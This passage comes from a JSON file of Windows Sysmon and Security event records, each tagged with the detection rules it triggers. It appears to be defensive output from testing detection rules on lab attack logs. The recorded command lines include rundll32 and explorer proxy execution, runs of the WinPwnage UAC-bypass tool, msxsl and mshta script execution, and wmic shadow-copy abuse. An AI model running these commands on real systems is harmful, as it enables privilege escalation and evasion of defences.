17:51:14.254"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":18851,"Execution":{"#attributes":{"ProcessID":2044,"ThreadID":1636}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-18T17:51:14.254967Z"}},"Version":5}}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\rundll32.exe\" advpack.dll,RegisterOCX c:\\Windows\\System32\\calc.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 
(win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-2523-5CD8-0000-00204C360100","LogonId":"0x1364c","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-2B1B-5CD8-0000-0010CCC92500","ParentProcessId":3320,"ProcessGuid":"365ABB72-2B21-5CD8-0000-001039DD2500","ProcessId":816,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 14:18:09.573"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16452,"Execution":{"#attributes":{"ProcessID":2036,"ThreadID":296}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-12T14:18:09.589507Z"}},"Version":5}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-05-12 13:56:12.329","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-25EC-5CD8-0000-0010CB0A1000","ProcessId":684,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\shdocvw.url","UtcTime":"2019-05-12 
13:56:12.329"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":16437,"Execution":{"#attributes":{"ProcessID":2036,"ThreadID":296}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-12T13:56:12.329626Z"}},"Version":2}}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\rundll32.exe\" shdocvw.dll,OpenURL c:\\users\\ieuser\\appdata\\local\\temp\\shdocvw.url","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-2523-5CD8-0000-00204C360100","LogonId":"0x1364c","ParentCommandLine":"python winpwnage.py -u execute -i 12 -p c:\\Windows\\System32\\calc.exe","ParentImage":"C:\\Python27\\python.exe","ParentProcessGuid":"365ABB72-25EC-5CD8-0000-0010CB0A1000","ParentProcessId":684,"ProcessGuid":"365ABB72-25FC-5CD8-0000-0010906A1300","ProcessId":2168,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 
13:56:12.485"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16438,"Execution":{"#attributes":{"ProcessID":2036,"ThreadID":296}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-12T13:56:12.652868Z"}},"Version":5}}}},{"detection":["XSL Script Processing"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"msxsl.exe c:\\Users\\IEUser\\AppData\\Roaming\\Adobe\\test.dat c:\\Users\\IEUser\\AppData\\Roaming\\Adobe\\test.dat","Company":"Microsoft","CurrentDirectory":"D:\\","Description":"msxsl","FileVersion":"1.1.0.1","Hashes":"SHA1=8B516E7BE14172E49085C4234C9A53C6EB490A45,MD5=3E9F31B4E2CD423C015D34D63047685E,SHA256=35BA7624F586086F32A01459FCC0AB755B01B49D571618AF456AA49E593734C7,IMPHASH=2477F6A819520981112AD254E2BD87D8","Image":"\\\\vboxsrv\\HTools\\msxsl.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-CE6C-5CE6-0000-002047F30000","LogonId":"0xf347","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-D2D4-5CE6-0000-001047EA6400","ParentProcessId":2236,"ProcessGuid":"365ABB72-D7B0-5CE6-0000-001077C56D00","ProcessId":3388,"Product":"Command Line XSLT","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-23 
17:26:08.686"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":1017,"Execution":{"#attributes":{"ProcessID":2032,"ThreadID":2092}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-23T17:26:08.716859Z"}},"Version":5}}}},{"detection":["XSL Script Processing"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Company":"Microsoft Corporation","Description":"MSXML 3.0 SP11","FileVersion":"8.110.7601.23648","Hashes":"SHA1=723644A78C703DF177235E820A906B9621B9B2FB,MD5=3CB096F266A52F65A571B2A3FC81D13E,SHA256=12D498F5310AD70818C7251B5D6AAF145CD7FA67887125645E245D856347BFAA,IMPHASH=EF7BEA73AB4F834F0C44DDE0150B5648","Image":"\\\\vboxsrv\\HTools\\msxsl.exe","ImageLoaded":"C:\\Windows\\System32\\msxml3.dll","ProcessGuid":"365ABB72-D7B0-5CE6-0000-001077C56D00","ProcessId":3388,"Product":"Microsoft(R) MSXML 3.0 SP11","RuleName":"Execution - Suspicious Microsoft.XMLDOM module load","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2019-05-23 17:26:08.927"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":7,"EventRecordID":1018,"Execution":{"#attributes":{"ProcessID":2032,"ThreadID":2092}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":7,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-23T17:26:08.947190Z"}},"Version":3}}}},{"detection":["Suspicious 
ftp.exe"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\system32\\cmd.exe /C c:\\Windows\\system32\\calc.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-4FB5-5CD8-0000-0020F2350100","LogonId":"0x135f2","ParentCommandLine":"\"C:\\Windows\\System32\\ftp.exe\" -s:c:\\users\\ieuser\\appdata\\local\\temp\\ftp.txt","ParentImage":"C:\\Windows\\System32\\ftp.exe","ParentProcessGuid":"365ABB72-55F1-5CD8-0000-00108A153300","ParentProcessId":3668,"ProcessGuid":"365ABB72-55F1-5CD8-0000-0010781C3300","ProcessId":2392,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 17:20:49.261"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16513,"Execution":{"#attributes":{"ProcessID":2012,"ThreadID":300}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-12T17:20:49.443464Z"}},"Version":5}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Binary 
Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\cmd.exe","ProcessGuid":"6661D424-EC73-5EFE-0000-00109FEA6300","ProcessId":6292,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-2190595668-4244358899-639490025-500\\\\Device\\HarddiskVolume4\\Windows\\explorer.exe","UtcTime":"2020-07-03 09:05:58.257"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"win10.ecorp.com","Correlation":null,"EventID":13,"EventRecordID":400701,"Execution":{"#attributes":{"ProcessID":1444,"ThreadID":3796}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-03T09:05:58.276333Z"}},"Version":2}}}},{"detection":["Explorer Root Flag Process Tree Break","Proxy Execution Via Explorer.exe"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"explorer.exe /root,\"c:\\windows\\System32\\calc.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\Administrator.ECORP\\","Description":"Windows Explorer","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=59AB8548708342C77C51F70EEC5CED0A88DC4701,MD5=6A65873EA949C5CCC72DDEF9E9780AA5,SHA256=16656BBB748BA1C811BB2C68D987DC0F5CAF149E41A84E45F6B6ECAAF7D29AB2,IMPHASH=0B98A47B3DAF2EE45939EF2A0F188959","Image":"C:\\Windows\\explorer.exe","IntegrityLevel":"High","LogonGuid":"6661D424-948B-5EEF-0000-002072300F00","LogonId":"0xf3072","OriginalFileName":"EXPLORER.EXE","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"6661D424-EC73-5EFE-0000-00109FEA6300","ParentProcessId":6292,"ProcessGuid":"6661D424-F4F6-5EFE-0000-0010E7EFF800","ProcessId":6860,"Product":"Microsoft® Windows® 
Operating System","RuleName":"","TerminalSessionId":1,"User":"ECORP\\Administrator","UtcTime":"2020-07-03 09:05:58.268"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"win10.ecorp.com","Correlation":null,"EventID":1,"EventRecordID":400702,"Execution":{"#attributes":{"ProcessID":1444,"ThreadID":3796}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-03T09:05:58.278154Z"}},"Version":5}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\svchost.exe","ProcessGuid":"6661D424-9438-5EEF-0000-00104DA20000","ProcessId":792,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-2190595668-4244358899-639490025-500\\\\Device\\HarddiskVolume4\\Windows\\explorer.exe","UtcTime":"2020-07-03 09:05:58.319"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"win10.ecorp.com","Correlation":null,"EventID":13,"EventRecordID":400703,"Execution":{"#attributes":{"ProcessID":1444,"ThreadID":3796}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-03T09:05:58.364162Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Binary 
Data","EventType":"SetValue","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"00000000-0000-0000-0000-000000000000","ProcessId":6860,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-2190595668-4244358899-639490025-500\\\\Device\\HarddiskVolume4\\Windows\\explorer.exe","UtcTime":"2020-07-03 09:05:58.547"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"win10.ecorp.com","Correlation":null,"EventID":13,"EventRecordID":400707,"Execution":{"#attributes":{"ProcessID":1444,"ThreadID":3796}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-03T09:05:58.619637Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\System32\\calc.exe","ProcessGuid":"6661D424-F4F6-5EFE-0000-0010C00AF900","ProcessId":3224,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-2190595668-4244358899-639490025-500\\\\Device\\HarddiskVolume4\\Windows\\System32\\win32calc.exe","UtcTime":"2020-07-03 09:05:58.707"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"win10.ecorp.com","Correlation":null,"EventID":13,"EventRecordID":400708,"Execution":{"#attributes":{"ProcessID":1444,"ThreadID":3796}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-03T09:05:58.737753Z"}},"Version":2}}}},{"detection":["Whoami 
Execution","Local Accounts Discovery"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"whoami /groups ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-7B40-5CEC-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"cmd.exe /c whoami /groups ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-FE66-5CEB-0000-001058F50B00","ParentProcessId":3256,"ProcessGuid":"365ABB72-FE66-5CEB-0000-0010C7F80B00","ProcessId":1168,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-05-27 15:12:38.270"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":6170,"Execution":{"#attributes":{"ProcessID":980,"ThreadID":2220}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-27T15:12:38.290374Z"}},"Version":5}}}},{"detection":["Shadow Copies Creation Using Operating Systems Utilities"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\system32\\wbem\\wmic.exe /output:C:\\Windows\\TEMP\\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create \"ClientAccessible\", 
\"C:\\\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"WMI Commandline Utility","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443","Image":"C:\\Windows\\System32\\wbem\\WMIC.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-7B40-5CEC-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe /output:C:\\Windows\\TEMP\\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create \"ClientAccessible\", \"C:\\\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-FE6F-5CEB-0000-0010F4370C00","ParentProcessId":3448,"ProcessGuid":"365ABB72-FE6F-5CEB-0000-0010D33A0C00","ProcessId":3344,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-05-27 15:12:47.456"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":6182,"Execution":{"#attributes":{"ProcessID":980,"ThreadID":2220}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-27T15:12:47.478285Z"}},"Version":5}}}},{"detection":["Suspicious WMI Execution","Shadow Copies Creation Using Operating Systems Utilities"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\system32\\wbem\\wmic.exe process call create \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy7\\\\Windows\\Temp\\svhost64.exe ","Company":"Microsoft 
Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"WMI Commandline Utility","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443","Image":"C:\\Windows\\System32\\wbem\\WMIC.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-7B40-5CEC-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe process call create \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy7\\\\Windows\\Temp\\svhost64.exe ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-FE76-5CEB-0000-0010546E0C00","ParentProcessId":2356,"ProcessGuid":"365ABB72-FE76-5CEB-0000-001077710C00","ProcessId":2840,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-05-27 15:12:54.515"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":6190,"Execution":{"#attributes":{"ProcessID":980,"ThreadID":2220}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-27T15:12:54.544664Z"}},"Version":5}}}},{"detection":["Suspicious Script Execution From Temp Folder"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\mshta.exe\" \"C:\\Users\\IEUser\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\S97WTYG7\\update.hta\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"Microsoft (R) HTML 
Application host","FileVersion":"11.00.9600.16428 (winblue_gdr.131013-1700)","Hashes":"SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A","Image":"C:\\Windows\\System32\\mshta.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-98E4-5D04-0000-0020A4350100","LogonId":"0x135a4","ParentCommandLine":"\"C:\\Program Files\\Internet Explorer\\iexplore.exe\" C:\\Users\\IEUser\\Downloads\\update.html","ParentImage":"C:\\Program Files\\Internet Explorer\\iexplore.exe","ParentProcessGuid":"365ABB72-9972-5D04-0000-0010F0490C00","ParentProcessId":3660,"ProcessGuid":"365ABB72-9AA6-5D04-0000-00109C850F00","ProcessId":652,"Product":"Internet Explorer","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-06-15 07:13:42.278"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":7648,"Execution":{"#attributes":{"ProcessID":2044,"ThreadID":2092}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-06-15T07:13:42.294109Z"}},"Version":5}}}},{"detection":["Rundll32 Without Parameters"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"rundll32.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 
(win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-0A6F-5D1D-0000-0020CA350100","LogonId":"0x135ca","ParentCommandLine":"\"C:\\Windows\\system32\\notepad.exe\" ","ParentImage":"C:\\Windows\\System32\\notepad.exe","ParentProcessGuid":"365ABB72-1256-5D1D-0000-0010FB1A1B00","ParentProcessId":1632,"ProcessGuid":"365ABB72-1282-5D1D-0000-0010DD401B00","ProcessId":2328,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-07-03 20:39:30.254"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":8352,"Execution":{"#attributes":{"ProcessID":112,"ThreadID":2084}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-03T20:39:30.254733Z"}},"Version":5}}}},{"detection":["(Built-in Logic) - User added to interesting 
group"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"MemberName":"-","MemberSid":"S-1-5-21-3461203602-4096304019-2269080069-501","PrivilegeList":"-","SubjectDomainName":"MSEDGEWIN10","SubjectLogonId":"0x27a10f","SubjectUserName":"IEUser","SubjectUserSid":"S-1-5-21-3461203602-4096304019-2269080069-1000","TargetDomainName":"Builtin","TargetSid":"S-1-5-32-544","TargetUserName":"Administrators"},"System":{"Channel":"Security","Computer":"MSEDGEWIN10","Correlation":{"#attributes":{"ActivityID":"15957A0B-7182-0000-A07A-95158271D501"}},"EventID":4732,"EventRecordID":191029,"Execution":{"#attributes":{"ProcessID":624,"ThreadID":4452}},"Keywords":"0x8020000000000000","Level":0,"Opcode":0,"Provider":{"#attributes":{"Guid":"54849625-5478-4994-A5BA-3E3B0328C30D","Name":"Microsoft-Windows-Security-Auditing"}},"Security":null,"Task":13826,"TimeCreated":{"#attributes":{"SystemTime":"2019-09-22T11:22:05.201727Z"}},"Version":0}}}},{"detection":["(Built-in Logic) - User added to interesting 
